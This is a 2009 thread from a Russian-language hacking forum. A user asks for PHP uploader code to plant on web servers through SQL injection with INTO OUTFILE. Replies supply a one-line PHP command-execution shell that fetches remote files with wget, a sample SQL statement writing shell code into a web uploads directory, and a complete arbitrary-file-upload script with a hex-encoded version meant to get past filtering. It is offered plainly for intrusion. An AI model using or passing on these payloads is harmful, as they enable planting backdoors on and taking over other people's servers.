ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL аплоадер
  #1  
Старый 21.01.2009, 15:40
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию SQL аплоадер

Друзья, не стал флеймить по разделам.. где-то тут на форуме проскакивал код SQL ( аплоадера.. ) ну.. что бы потом его INTO OUTFILE.. т.е. не код шелла в базу.. а именно там был код простенького php аплоадера.. а потом уже можно заливать все, что хочешь... ткните носом в тему, вчера ночью все обыскал
 
Ответить с цитированием

  #2  
Старый 21.01.2009, 15:42
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Такой что ле?
PHP код:
<?php system("wget {$_GET['target']}"); ?>
 
Ответить с цитированием

  #3  
Старый 21.01.2009, 15:45
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

groundhog, нет.. именно php аплоадер.. не прохексенный.. а код.. дело в том, что там некоторые символы фильтруются ведь..
 
Ответить с цитированием

  #4  
Старый 21.01.2009, 15:46
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

Цитата:
Сообщение от groundhog  
Такой что ле?
PHP код:
<?php system("wget {$_GET['target']}"); ?>
Цитата:
groundhog, нет.. именно php аплоадер.. не прохексенный.. а код.. дело в том, что там некоторые символы фильтруются ведь..
а че выше не php? XD
 
Ответить с цитированием

  #5  
Старый 21.01.2009, 15:47
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729

Репутация: 67
По умолчанию

он же говорит что там фильтрацию обойти надо
 
Ответить с цитированием

  #6  
Старый 21.01.2009, 15:48
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

Sn@k3, йа плакаль ) ща https://forum.antichat.ru/thread76949-%F8%E5%EB%EB+SQL.html вот тут
INSERT INTO `shell` bla bla..
SELECT ("код шела") INTO OUTFILE '/var/www/forum/uploads/counter.php';

именно аплоадер нужен.. своими глазами видел код, мы с вами не о том говоримм )) :-D
 
Ответить с цитированием

  #7  
Старый 21.01.2009, 15:50
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

Артем Солнце, спасибо ) единственный, до кого дошло Тут код АПЛОАДЕРА был с обходом фильтрации спец. символов.. вот как-то я его видел.. а вчера нужен был - полночи гуглил " sql шелл into site:forum.antichat.ru" и в таком духе .. =\
 
Ответить с цитированием

  #8  
Старый 21.01.2009, 16:01
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729

Репутация: 67
По умолчанию

х.е.з. м.б. не то, но глянь:
https://forum.antichat.ru/threadnav24918-1-10.html
https://forum.antichat.ru/showthread.php?t=56409
 
Ответить с цитированием

  #9  
Старый 21.01.2009, 16:02
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

я ничего не понял, тебе нужен был sql запрос?
вот например простинький пример phpuploader

PHP код:

<?php
$path 
$_SERVER['DOCUMENT_ROOT'];
$path_to_script $_SERVER['PHP_SELF'];
$uplouder = <<<HERE
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset="windows-1251">
<title> Загрузка файлов на сервер </title>
</head>
<body>
<h2><b> Форма для загрузки файлов </b></h2>
<form action="
$path_to_script" method="post" enctype="multipart/form-data">
Путь к файлу на сервере
<input type="text" name="new_path" value = 
$path><br>
Имя файла на сервере
<input type="text" name="new_name" value = "uploud.php"><br>
<input type="file" name="filename"><br>
<input type="submit" value="3aгpyзитьтb"><br>
</form>
</body>
</html>
HERE;
$uploadfile= @$_POST['new_path'] . "/" . @$_POST['new_name'];
if (
move_uploaded_file(@$_FILES['filename']['tmp_name'], $uploadfile))
{
echo 
"Файл успешно загруженн, он доступен по этому пути:" $uploadfile ;
}
else 
{
echo 
$uplouder;

?>
a вот в hex
Цитата:
0x0d0a3c3f7068700d0a2470617468203d20245f5345525645 525b27444f43554d454e545f524f4f54275d3b0d0a24706174 685f746f5f736372697074203d20245f5345525645525b2750 48505f53454c46275d3b0d0a2475706c6f75646572203d203c 3c3c484552450d0a3c68746d6c3e0d0a3c686561643e0d0a3c 4d45544120687474702d65717569763d436f6e74656e742d54 79706520636f6e74656e743d22746578742f68746d6c3b2063 6861727365743d2277696e646f77732d31323531223e0d0a3c 7469746c653e20c7e0e3f0f3e7eae020f4e0e9ebeee220ede0 20f1e5f0e2e5f0203c2f7469746c653e0d0a3c2f686561643e 0d0a3c626f64793e0d0a3c68323e3c623e20d4eef0ece020e4 ebff20e7e0e3f0f3e7eae820f4e0e9ebeee2203c2f623e3c2f 68323e0d0a3c666f726d20616374696f6e3d2224706174685f 746f5f73637269707422206d6574686f643d22706f73742220 656e63747970653d226d756c7469706172742f666f726d2d64 617461223e0d0acff3f2fc20ea20f4e0e9ebf320ede020f1e5 f0e2e5f0e50d0a3c696e70757420747970653d227465787422 206e616d653d226e65775f70617468222076616c7565203d20 24706174683e3c62723e0d0ac8ecff20f4e0e9ebe020ede020 f1e5f0e2e5f0e50d0a3c696e70757420747970653d22746578 7422206e616d653d226e65775f6e616d65222076616c756520 3d202275706c6f75642e706870223e3c62723e0d0a3c696e70 757420747970653d2266696c6522206e616d653d2266696c65 6e616d65223e3c62723e0d0a3c696e70757420747970653d22 7375626d6974222076616c75653d223361e37079e7e8f2fcf2 62223e3c62723e0d0a3c2f666f726d3e0d0a3c2f626f64793e 0d0a3c2f68746d6c3e0d0a484552453b0d0a2475706c6f6164 66696c653d2040245f504f53545b276e65775f70617468275d 202e20222f22202e2040245f504f53545b276e65775f6e616d 65275d3b0d0a696620286d6f76655f75706c6f616465645f66 696c652840245f46494c45535b2766696c656e616d65275d5b 27746d705f6e616d65275d2c202475706c6f616466696c6529 290d0a7b0d0a6563686f2022d4e0e9eb20f3f1efe5f8edee20 e7e0e3f0f3e6e5eded2c20eeed20e4eef1f2f3efe5ed20efee 20fdf2eeecf320eff3f2e83a22202e202475706c6f61646669 6c65203b0d0a7d0d0a656c7365200d0a7b0d0a6563686f2024 75706c6f756465723b0d0a7d200d0a3f3e
 
Ответить с цитированием

  #10  
Старый 21.01.2009, 16:04
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

AkyHa_MaTaTa, спасибо! то, что нужно
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ